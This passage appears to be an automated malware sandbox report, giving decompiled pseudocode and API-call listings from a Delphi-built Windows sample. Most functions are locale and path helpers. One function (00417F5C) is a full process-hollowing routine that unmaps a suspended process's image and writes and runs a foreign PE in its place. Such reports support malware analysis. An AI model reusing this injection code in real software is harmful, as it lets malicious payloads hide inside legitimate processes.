						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}








    0x00404d8c
    0x00404d92
    0x00404da2
    0x00404dab
    0x00404db0
    0x00404db2
    0x00404db7
    0x00404dbc
    0x00404dbc
    0x00404db7
    0x00404dca

    APIs
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00404DA2
      • Part of subcall function 00404FC0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
      • Part of subcall function 00404FC0: RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
      • Part of subcall function 00404FC0: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
      • Part of subcall function 00404FC0: GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
      • Part of subcall function 00404FC0: lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 00403B18, Relevance: .0, Instructions: 37
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 00402670, Relevance: .0, Instructions: 14
    C-Code - Quality: 37%
    			E00402670(void* __eax) {
				void* _t3;
				void* _t6;

				if(__eax <= 0) {
					_t6 = 0;
				} else {
					_t3 =  *0x41903c(); // executed
					_t6 = _t3;
					if(_t6 == 0) {
						E00402778(1);
					}
				}
				return _t6;
			}





    0x00402673
    0x0040268a
    0x00402675
    0x00402675
    0x0040267b
    0x0040267f
    0x00402683
    0x00402683
    0x0040267f
    0x0040268f

    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 00403B78, Relevance: .0, Instructions: 12
    C-Code - Quality: 100%
    			E00403B78(intOrPtr __eax, intOrPtr __edx) {
				void* _t6;
				intOrPtr _t7;

				_t7 = __edx;
				 *0x454014 = 0x4011a8;
				 *0x454018 = 0x4011b0;
				 *0x454638 = __eax;
				 *0x45463c = 0;
				 *0x454640 = __edx;
				_t1 = _t7 + 4; // 0x400000
				 *0x45402c =  *_t1;
				E00403A70();
				 *0x454034 = 0; // executed
				_t6 = E00403B18(); // executed
				return _t6;
			}





    0x00403b78
    0x00403b78
    0x00403b82
    0x00403b8c
    0x00403b93
    0x00403b98
    0x00403b9e
    0x00403ba1
    0x00403ba6
    0x00403bab
    0x00403bb2
    0x00403bb7

    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd

    Non-executed Functions

    Function 00417F5C, Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 236
    C-Code - Quality: 76%
    			E00417F5C(intOrPtr __eax, void* __ebx, short* __ecx, char __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v12;
				CONTEXT* _v16;
				void* _v20;
				void _v24;
				void _v28;
				long _v32;
				struct _PROCESS_INFORMATION _v48;
				struct _STARTUPINFOA _v116;
				CHAR* _t95;
				short* _t171;
				intOrPtr _t182;
				intOrPtr _t189;
				intOrPtr* _t194;
				short* _t196;
				void* _t197;
				void* _t199;
				void* _t200;
				intOrPtr _t201;
				void* _t215;

				_t215 = __fp0;
				_t199 = _t200;
				_t201 = _t200 + 0xffffff90;
				_t196 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404338(_v8);
				E00404338(_v12);
				_push(_t199);
				_push(0x418218);
				_push( *[fs:eax]);
				 *[fs:eax] = _t201;
				if(_v12 != 0) {
					_push(0x418230);
					_push(_v8);
					_push(0x41823c);
					_push(_v12);
					E00404208();
				}
				 *_a4 = 0;
				_t171 = _t196;
				if( *_t171 == 0x5a4d) {
					_t194 =  *((intOrPtr*)(_t171 + 0x3c)) + _t196;
					if( *_t194 == 0x4550) {
						E00402B60( &_v116, 0x44);
						E00402B60( &_v48, 0x10);
						_v116.cb = 0x44;
						_v116.dwFlags = 1;
						_v116.wShowWindow = 0;
						_t95 = E00404348(_v12);
						if(CreateProcessA(E00404348(_v8), _t95, 0, 0, 0, 4, 0, 0,  &_v116,  &_v48) != 0) {
							 *_a4 = _v48.dwProcessId;
							_v16 = E00417F28( &_v20);
							if(_v16 != 0) {
								_v16->ContextFlags = 0x10007;
								if(GetThreadContext(_v48.hThread, _v16) != 0) {
									ReadProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v24, 4,  &_v32);
									if( *(_t194 + 0x34) != _v24) {
										_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
									} else {
										if(NtUnmapViewOfSection(_v48.hProcess,  *(_t194 + 0x34)) != 0) {
											_v28 = VirtualAllocEx(_v48.hProcess, 0,  *(_t194 + 0x50), 0x3000, 0x40);
										} else {
											_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
										}
									}
									_t210 = _v28;
									if(_v28 != 0) {
										_t197 = E00417EA4(_t196, _t210);
										_t125 = _v28;
										if( *(_t194 + 0x34) != _v28) {
											E00417E10(_t215, _t197, _t194, _t125 -  *(_t194 + 0x34));
											 *(_t194 + 0x34) = _v28;
											E00405DE0( *((intOrPtr*)(_t171 + 0x3c)) + _t197, _t194);
										}
										WriteProcessMemory(_v48.hProcess, _v28, _t197,  *(_t194 + 0x50),  &_v32);
										WriteProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v28, 4,  &_v32);
										_v16->Eax =  *((intOrPtr*)(_t194 + 0x28)) + _v28;
										SetThreadContext(_v48.hThread, _v16);
										ResumeThread(_v48.hThread);
										WaitForSingleObject(_v48.hThread, 0xffffffff);
										_push(_t199);
										_push(0x4181d0);
										_push( *[fs:eax]);
										 *[fs:eax] = _t201;
										TerminateThread(_v48.hProcess, 0);
										CloseHandle(_v48.hProcess);
										_pop(_t189);
										 *[fs:eax] = _t189;
									}
								}
								VirtualFree(_v20, 0, 0x8000);
							}
							if( *_a4 == 0) {
								TerminateProcess(_v48, 0);
							}
						}
					}
				}
				_pop(_t182);
				 *[fs:eax] = _t182;
				_push(E0041821F);
				return E00403EAC( &_v12, 2);
			}























    0x00417f5c
    0x00417f5d
    0x00417f5f
    0x00417f65
    0x00417f67
    0x00417f6a
    0x00417f70
    0x00417f78
    0x00417f7f
    0x00417f80
    0x00417f85
    0x00417f88
    0x00417f8f
    0x00417f91
    0x00417f96
    0x00417f99
    0x00417f9e
    0x00417fa9
    0x00417fa9
    0x00417fb3
    0x00417fb5
    0x00417fbc
    0x00417fc5
    0x00417fcd
    0x00417fdd
    0x00417fec
    0x00417ff1
    0x00417ff8
    0x00417fff
    0x0041801c
    0x00418032
    0x0041803e
    0x00418048
    0x0041804f
    0x00418058
    0x0041806d
    0x0041808e
    0x00418099
    0x004180fc
    0x0041809b
    0x004180aa
    0x004180df
    0x004180ac
    0x004180c4
    0x004180c4
    0x004180aa
    0x004180ff
    0x00418103
    0x00418110
    0x00418115
    0x0041811a
    0x00418122
    0x0041812a
    0x00418139
    0x00418139
    0x0041814f
    0x0041816f
    0x0041817d
    0x0041818b
    0x00418194
    0x0041819f
    0x004181a6
    0x004181a7
    0x004181ac
    0x004181af
    0x004181b8
    0x004181c1
    0x004181c8
    0x004181cb
    0x004181cb
    0x00418103
    0x004181e5
    0x004181e5
    0x004181f0
    0x004181f8
    0x004181f8
    0x004181f0
    0x00418032
    0x00417fcd
    0x004181ff
    0x00418202
    0x00418205
    0x00418217

    APIs
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F28: VirtualAlloc.KERNEL32(00000000,000000D0,00001000,00000004,?,00418048,00000000,00418218), ref: 00417F39
    • GetThreadContext.KERNEL32(?,00000000), ref: 00418066
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
    • NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
    • WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
    • SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
    • ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
    • TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
    • CloseHandle.KERNEL32(?), ref: 004181C1
    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
    • TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 00404E08, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136
    C-Code - Quality: 53%
    			E00404E08(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00404DF4(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00404DF4(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L00401248();
									while( *_t93 != 0) {
										_t90 = E00404DF4(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L00401248();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00401250();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L00401248();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00401250();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L00401248();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L00401248();
						}
					}
				}
				L17:
				return _v16;
			}



















    0x00404e14
    0x00404e17
    0x00404e1d
    0x00404e2a
    0x00404e2e
    0x00404e70
    0x00404e76
    0x00404eb3
    0x00000000
    0x00404e78
    0x00404e7f
    0x00404e90
    0x00404e95
    0x00404e9b
    0x00404ea3
    0x00404ea8
    0x00404eb6
    0x00404eb8
    0x00404ebe
    0x00404ec2
    0x00404ec9
    0x00404eca
    0x00404f75
    0x00404edc
    0x00404ee0
    0x00404eed
    0x00404ef4
    0x00404ef5
    0x00404efe
    0x00404eff
    0x00404f17
    0x00404f1c
    0x00404f1f
    0x00404f24
    0x00404f2a
    0x00404f2b
    0x00404f3b
    0x00404f3d
    0x00404f4d
    0x00404f54
    0x00404f5e
    0x00404f5f
    0x00404f64
    0x00404f6a
    0x00404f6b
    0x00404f71
    0x00404f73
    0x00000000
    0x00404f73
    0x00404f3b
    0x00404f1c
    0x00000000
    0x00404eed
    0x00404f81
    0x00404f88
    0x00404f8c
    0x00404f8d
    0x00404f8d
    0x00404ea8
    0x00404e95
    0x00404e7f
    0x00404e30
    0x00404e3b
    0x00404e3f
    0x00000000
    0x00404e41
    0x00404e41
    0x00404e4c
    0x00404e50
    0x00404e55
    0x00000000
    0x00404e57
    0x00404e5a
    0x00404e61
    0x00404e65
    0x00404e66
    0x00404e66
    0x00404e55
    0x00404e3f
    0x00404f92
    0x00404f9b

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
    • lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404DF4: CharNextA.USER32(?), ref: 00404DF7
    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
    • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
    • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 0040B2B4, Relevance: 3.0, APIs: 2, Instructions: 37
    C-Code - Quality: 46%
    			E0040B2B4(int __eax, void* __ebx, void* __eflags) {
				char _v11;
				char _v16;
				intOrPtr _t28;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v16 = 0;
				_push(_t31);
				_push(0x40b318);
				_push( *[fs:edx]);
				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
				E004040F8( &_v16, 7,  &_v11);
				_push(_v16);
				E00407174(7, GetACP(), _t33);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0040B31F);
				return E00403E88( &_v16);
			}








    0x0040b2b4
    0x0040b2bd
    0x0040b2c2
    0x0040b2c3
    0x0040b2c8
    0x0040b2cb
    0x0040b2da
    0x0040b2ea
    0x0040b2f2
    0x0040b2fb
    0x0040b304
    0x0040b307
    0x0040b30a
    0x0040b317

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040B318), ref: 0040B2DA
    • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040B318), ref: 0040B2F3
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 0040587A, Relevance: 1.5, APIs: 1, Instructions: 38
    C-Code - Quality: 51%
    			E0040587A(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x4058e2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E004040F8( &_v20, 7,  &_v15);
				E00402B80(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E004058E9);
				return E00403E88( &_v20);
			}








    0x00405885
    0x0040588a
    0x0040588b
    0x00405890
    0x00405893
    0x004058a2
    0x004058b2
    0x004058bd
    0x004058c8
    0x004058c8
    0x004058ce
    0x004058d1
    0x004058d4
    0x004058e1

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 0040587C, Relevance: 1.5, APIs: 1, Instructions: 37
    C-Code - Quality: 51%
    			E0040587C(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x4058e2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E004040F8( &_v20, 7,  &_v15);
				E00402B80(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E004058E9);
				return E00403E88( &_v20);
			}








    0x00405885
    0x0040588a
    0x0040588b
    0x00405890
    0x00405893
    0x004058a2
    0x004058b2
    0x004058bd
    0x004058c8
    0x004058c8
    0x004058ce
    0x004058d1
    0x004058d4
    0x004058e1

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 00409DB0, Relevance: 1.5, APIs: 1, Instructions: 29
    C-Code - Quality: 100%
    			E00409DB0(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
					return E00403EDC(_t10, _t18);
				}
				return E00403F78(_t10, _t5 - 1,  &_v260);
			}






    0x00409dbb
    0x00409dbd
    0x00409dd5
    0x00000000
    0x00409ded
    0x00000000

    APIs
    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 00409DFC, Relevance: 1.5, APIs: 1, Instructions: 23
    C-Code - Quality: 79%
    			E00409DFC(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}






    0x00409dff
    0x00409e00
    0x00409e16
    0x00409e1d
    0x00409e18
    0x00409e18
    0x00409e18
    0x00409e23

    APIs
    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 00417A70, Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99
    C-Code - Quality: 100%
    			E00417A70() {

				if( *0x454a18 == 0) {
					 *0x454a18 = GetModuleHandleA("kernel32.dll");
					if( *0x454a18 != 0) {
						 *0x454a1c = GetProcAddress( *0x454a18, "CreateToolhelp32Snapshot");
						 *0x454a20 = GetProcAddress( *0x454a18, "Heap32ListFirst");
						 *0x454a24 = GetProcAddress( *0x454a18, "Heap32ListNext");
						 *0x454a28 = GetProcAddress( *0x454a18, "Heap32First");
						 *0x454a2c = GetProcAddress( *0x454a18, "Heap32Next");
						 *0x454a30 = GetProcAddress( *0x454a18, "Toolhelp32ReadProcessMemory");
						 *0x454a34 = GetProcAddress( *0x454a18, "Process32First");
						 *0x454a38 = GetProcAddress( *0x454a18, "Process32Next");
						 *0x454a3c = GetProcAddress( *0x454a18, "Process32FirstW");
						 *0x454a40 = GetProcAddress( *0x454a18, "Process32NextW");
						 *0x454a44 = GetProcAddress( *0x454a18, "Thread32First");
						 *0x454a48 = GetProcAddress( *0x454a18, "Thread32Next");
						 *0x454a4c = GetProcAddress( *0x454a18, "Module32First");
						 *0x454a50 = GetProcAddress( *0x454a18, "Module32Next");
						 *0x454a54 = GetProcAddress( *0x454a18, "Module32FirstW");
						 *0x454a58 = GetProcAddress( *0x454a18, "Module32NextW");
					}
				}
				if( *0x454a18 == 0 ||  *0x454a1c == 0) {
					return 0;
				} else {
					return 1;
				}
			}



    0x00417a79
    0x00417a89
    0x00417a8e
    0x00417aa1
    0x00417ab3
    0x00417ac5
    0x00417ad7
    0x00417ae9
    0x00417afb
    0x00417b0d
    0x00417b1f
    0x00417b31
    0x00417b43
    0x00417b55
    0x00417b67
    0x00417b79
    0x00417b8b
    0x00417b9d
    0x00417baf
    0x00417baf
    0x00417a8e
    0x00417bb7
    0x00417bc5
    0x00417bc6
    0x00417bc9
    0x00417bc9

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2,00000000,004183DD), ref: 00417A84
    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2), ref: 00417A9C
    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AAE
    • GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AC0
    • GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AD2
    • GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7), ref: 00417AE4
    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000), ref: 00417AF6
    • GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 00417B08
    • GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 00417B1A
    • GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 00417B2C
    • GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 00417B3E
    • GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 00417B50
    • GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 00417B62
